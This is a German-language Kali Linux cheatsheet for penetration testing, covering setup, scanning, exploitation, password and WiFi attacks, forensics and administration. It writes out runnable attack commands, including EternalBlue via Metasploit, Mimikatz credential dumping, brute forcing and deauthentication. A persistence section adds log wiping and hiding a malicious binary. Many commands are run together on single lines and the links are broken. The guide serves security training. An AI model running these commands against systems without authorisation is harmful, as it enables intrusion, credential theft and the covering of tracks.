Kali Linux Cheatsheet
Kali Linux ist eine Debian-basierte Linux-Distribution, die speziell für digitale Forensik und Penetrationstests entwickelt wurde. Kali Linux wird von Offensive Security entwickelt und gepflegt und wird mit über 600 Penetrationstests vorinstalliert, so dass es die Plattform für Cybersicherheitsexperten, ethische Hacker und Sicherheitsforscher weltweit ist.
Installation und Inbetriebnahme
Download und Installation
```bash
Download Kali Linux ISO
wget https://cdimage.kali.org/kali-2024.1/kali-linux-2024.1-installer-amd64.iso
Verify checksum
sha256sum kali-linux-2024.1-installer-amd64.iso
Create bootable USB (Linux)
sudo dd if=kali-linux-2024.1-installer-amd64.iso of=/dev/sdX bs=4M status=progress
Create bootable USB (Windows - use Rufus or similar tool)
Use Rufus, Etcher, or Win32DiskImager
```_
Virtual Machine Setup
```bash
VMware recommended settings
RAM: 4GB minimum, 8GB recommended
Storage: 80GB minimum
Network: NAT or Bridged
VirtualBox recommended settings
RAM: 4GB minimum, 8GB recommended
Storage: 80GB minimum, VDI format
Network: NAT or Bridged
Enable VT-x/AMD-V virtualization
```_
Erstkonfiguration
```bash
Update system
sudo apt update && sudo apt upgrade -y
Install additional tools
sudo apt install -y kali-linux-large
Configure non-root user (recommended)
sudo useradd -m -s /bin/bash username sudo usermod -aG sudo username sudo passwd username
Enable SSH (if needed)
sudo systemctl enable ssh sudo systemctl start ssh
Configure firewall
sudo ufw enable sudo ufw default deny incoming sudo ufw default allow outgoing ```_
Wesentliche Werkzeuge und Befehle
Informationen sammeln
```bash
Nmap - Network scanning
nmap -sS -sV -O target_ip nmap -sC -sV -oA scan_results target_ip nmap --script vuln target_ip
Masscan - Fast port scanner
masscan -p1-65535 target_ip --rate=1000
Dmitry - Information gathering
dmitry -winsepo output.txt target.com
theHarvester - Email and subdomain gathering
theHarvester -d target.com -l 500 -b google
Recon-ng - Web reconnaissance framework
recon-ng [recon-ng][default] > workspaces create target_workspace [recon-ng][target_workspace] > modules load recon/domains-hosts/google_site_web ```_
Bewertung der Schwachstelle
```bash
OpenVAS - Vulnerability scanner
sudo gvm-setup sudo gvm-start sudo gvm-feed-update
Nikto - Web vulnerability scanner
nikto -h http://target.com nikto -h http://target.com -o nikto_results.txt
Dirb - Directory brute forcer
dirb http://target.com dirb http://target.com /usr/share/dirb/wordlists/big.txt
Gobuster - Directory/file brute forcer
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt gobuster dns -d target.com -w /usr/share/wordlists/dnsmap.txt
WPScan - WordPress vulnerability scanner
wpscan --url http://target.com --enumerate u,p,t wpscan --url http://target.com --passwords /usr/share/wordlists/rockyou.txt ```_
Web Application Testing
```bash
Burp Suite - Web application security testing
burpsuite &
OWASP ZAP - Web application scanner
zaproxy &
SQLmap - SQL injection testing
sqlmap -u "http://target.com/page.php?id=1" --dbs sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump
Commix - Command injection testing
commix --url="http://target.com/page.php?id=1"
XSSer - Cross-site scripting testing
xsser --url "http://target.com/search.php?q=XSS" --auto ```_
Exploitation
```bash
Metasploit Framework
msfconsole msf6 > search type:exploit platform:windows msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS target_ip msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
Searchsploit - Exploit database search
searchsploit apache 2.4 searchsploit -m 12345.py
Social Engineering Toolkit
setoolkit
Select from menu options for phishing, credential harvesting, etc.
BeEF - Browser exploitation framework
beef-xss
Access web interface at http://127.0.0.1:3000/ui/panel
```_
Post-Exploitation
```bash
Meterpreter commands (within Metasploit session)
meterpreter > sysinfo meterpreter > getuid meterpreter > ps meterpreter > migrate PID meterpreter > hashdump meterpreter > screenshot meterpreter > download C:\file.txt /tmp/ meterpreter > upload /tmp/file.txt C:\
Empire - PowerShell post-exploitation
powershell-empire server powershell-empire client
Mimikatz - Credential extraction
mimikatz mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords mimikatz # lsadump::sam ```_
Passwort-Angriffe
```bash
John the Ripper - Password cracking
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt john --show hashes.txt
Hashcat - Advanced password recovery
hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt hashcat -m 1000 -a 3 hashes.txt ?a?a?a?a?a?a?a?a
Hydra - Network login cracker
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target_ip hydra -L users.txt -P passwords.txt ftp://target_ip hydra -l admin -P /usr/share/wordlists/rockyou.txt target_ip http-post-form "/login.php:username=^USER^&password;=^PASS^:Invalid"
Medusa - Parallel login brute forcer
medusa -h target_ip -u admin -P /usr/share/wordlists/rockyou.txt -M ssh medusa -H hosts.txt -U users.txt -P passwords.txt -M ftp
Crunch - Wordlist generator
crunch 8 8 -t ,@@@@@@@ -o wordlist.txt crunch 6 10 abcdefghijklmnopqrstuvwxyz0123456789 -o custom_wordlist.txt ```_
Kabellose Sicherheit
```bash
Aircrack-ng suite - WiFi security testing
Monitor mode
airmon-ng start wlan0
Capture packets
airodump-ng wlan0mon
Capture specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
Deauth attack
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
Crack WPA/WPA2
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
Reaver - WPS attack
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
Wifite - Automated wireless attack
wifite --wpa --dict /usr/share/wordlists/rockyou.txt ```_
Digitale Forensik
```bash
Autopsy - Digital forensics platform
autopsy &
Volatility - Memory analysis
volatility -f memory.dump imageinfo volatility -f memory.dump --profile=Win7SP1x64 pslist volatility -f memory.dump --profile=Win7SP1x64 netscan volatility -f memory.dump --profile=Win7SP1x64 malfind
Binwalk - Firmware analysis
binwalk firmware.bin binwalk -e firmware.bin
Foremost - File carving
foremost -i disk_image.dd -o recovered_files/
Sleuth Kit - File system analysis
fls -r disk_image.dd icat disk_image.dd inode_number > recovered_file ```_
Reverse Engineering
```bash
Ghidra - NSA reverse engineering tool
ghidra &
Radare2 - Reverse engineering framework
r2 binary_file [0x00000000]> aaa [0x00000000]> pdf @main
GDB - GNU Debugger
gdb binary_file (gdb) run (gdb) break main (gdb) continue (gdb) info registers
Strings - Extract strings from binaries
strings binary_file strings -n 10 binary_file|grep -i password
Hexdump - Hex viewer
hexdump -C binary_file|head -20 xxd binary_file|head -20 ```_
Systemverwaltung
Paketmanagement
```bash
Update package lists
sudo apt update
Upgrade all packages
sudo apt upgrade -y
Install specific tools
sudo apt install -y tool_name
Install Kali metapackages
sudo apt install -y kali-linux-large sudo apt install -y kali-linux-everything sudo apt install -y kali-tools-top10
Search for packages
apt search keyword apt show package_name
Remove packages
sudo apt remove package_name sudo apt purge package_name sudo apt autoremove ```_
Service Management
```bash
Systemctl commands
sudo systemctl start service_name sudo systemctl stop service_name sudo systemctl restart service_name sudo systemctl enable service_name sudo systemctl disable service_name sudo systemctl status service_name
Common services
sudo systemctl start ssh sudo systemctl start apache2 sudo systemctl start postgresql sudo systemctl start mysql
Check listening ports
netstat -tlnp ss -tlnp ```_
Netzwerkkonfiguration
```bash
Interface configuration
ip addr show ip link set eth0 up ip link set eth0 down
Static IP configuration
sudo nano /etc/network/interfaces
Add:
auto eth0
iface eth0 inet static
address 192.168.1.100
netmask 255.255.255.0
gateway 192.168.1.1
DNS configuration
sudo nano /etc/resolv.conf
Add:
nameserver 8.8.8.8
nameserver 8.8.4.4
Restart networking
sudo systemctl restart networking ```_
Benutzermanagement
```bash
Add user
sudo useradd -m -s /bin/bash username sudo passwd username
Add user to groups
sudo usermod -aG sudo username sudo usermod -aG adm username
Switch user
su - username sudo -u username command
View user information
id username groups username finger username
Lock/unlock user
sudo usermod -L username sudo usermod -U username ```_
Erweiterte Techniken
Benutzerdefinierte Werkzeuginstallation
```bash
Install from source
git clone https://github.com/tool/repository.git cd repository make && sudo make install
Python tools
pip3 install tool_name pip3 install -r requirements.txt
Go tools
go install github.com/tool/repository@latest
Ruby gems
gem install tool_name
Manual installation
wget https://example.com/tool.tar.gz tar -xzf tool.tar.gz cd tool ./configure && make && sudo make install ```_
Umwelt Anpassung
```bash
Bash aliases
nano ~/.bashrc
Add useful aliases:
alias ll='ls -la' alias la='ls -A' alias l='ls -CF' alias ..='cd ..' alias ...='cd ../..' alias grep='grep --color=auto' alias nmap='nmap --reason --open --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit'
Custom functions
function extract() \\{ if [ -f $1 ] ; then case $1 in .tar.bz2) tar xjf $1 ;; .tar.gz) tar xzf $1 ;; .bz2) bunzip2 $1 ;; .rar) unrar e $1 ;; .gz) gunzip $1 ;; .tar) tar xf $1 ;; .tbz2) tar xjf $1 ;; .tgz) tar xzf $1 ;; .zip) unzip $1 ;; .Z) uncompress $1 ;; .7z) 7z x $1 ;; ) echo "'$1' cannot be extracted via extract()" ;; esac else echo "'$1' is not a valid file" fi \\}
Source the changes
source ~/.bashrc ```_
Automatisierungsskripte
```bash
Basic reconnaissance script
!/bin/bash
TARGET=$1
if [ -z "$TARGET" ]; then
echo "Usage: $0
echo "Starting reconnaissance on $TARGET" mkdir -p results/$TARGET
Nmap scan
echo "Running Nmap scan..." nmap -sS -sV -sC -O -oA results/$TARGET/nmap_scan $TARGET
Directory enumeration
echo "Running directory enumeration..." gobuster dir -u http://$TARGET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o results/$TARGET/gobuster.txt
Nikto scan
echo "Running Nikto scan..." nikto -h http://$TARGET -o results/$TARGET/nikto.txt
echo "Reconnaissance complete. Results saved in results/$TARGET/" ```_
Persistenz und Stealth
```bash
SSH key persistence
ssh-keygen -t rsa -b 4096 ssh-copy-id user@target_ip
Cron job persistence
crontab -e
Add: @reboot /path/to/script.sh
Service persistence
sudo nano /etc/systemd/system/custom.service
Create service file for persistence
Log cleaning
sudo truncate -s 0 /var/log/auth.log sudo truncate -s 0 /var/log/syslog history -c && history -w
Process hiding
nohup ./malicious_binary > /dev/null 2>&1 & disown ```_
Fehlerbehebung
Gemeinsame Themen
```bash
WiFi adapter not working
sudo airmon-ng check kill sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up
VirtualBox guest additions
sudo apt install -y virtualbox-guest-x11 sudo VBoxClient --clipboard sudo VBoxClient --draganddrop
Graphics issues
sudo apt install -y kali-desktop-xfce sudo dpkg-reconfigure lightdm
Sound issues
sudo apt install -y pulseaudio pulseaudio --start
Network issues
sudo dhclient eth0 sudo systemctl restart networking sudo systemctl restart NetworkManager ```_
Leistungsoptimierung
```bash
Disable unnecessary services
sudo systemctl disable bluetooth sudo systemctl disable cups sudo systemctl disable avahi-daemon
Clean system
sudo apt autoremove sudo apt autoclean sudo apt clean
Monitor resources
htop iotop nethogs iftop
Optimize for VMs
sudo apt install -y open-vm-tools sudo apt install -y virtualbox-guest-utils ```_
Sicherheit Best Practices
Operationelle Sicherheit
```bash
Use VPN for testing
sudo openvpn config.ovpn
Proxy chains configuration
sudo nano /etc/proxychains.conf proxychains nmap target_ip
Tor usage
sudo systemctl start tor proxychains firefox
MAC address randomization
sudo macchanger -r wlan0 sudo macchanger -m 00:11:22:33:44:55 wlan0
Secure deletion
shred -vfz -n 3 sensitive_file wipe -rf directory/ ```_
Rechtliche und ethische Überlegungen
```bash
Always obtain proper authorization
Document scope and limitations
Follow responsible disclosure
Maintain confidentiality
Respect privacy and data protection laws
Create engagement documentation
echo "Penetration Test Authorization" > authorization.txt echo "Client: Company Name" >> authorization.txt echo "Scope: IP ranges, domains" >> authorization.txt echo "Date: $(date)" >> authorization.txt echo "Tester: Your Name" >> authorization.txt ```_
Ressourcen
- Kali Linux Offizielle Dokumentation
- [Offensive Security Training](LINK_5 -%20[Kali%20Linux%20Tools](LINK_5 -%20(__LINK_5___)
- (__LINK_5___)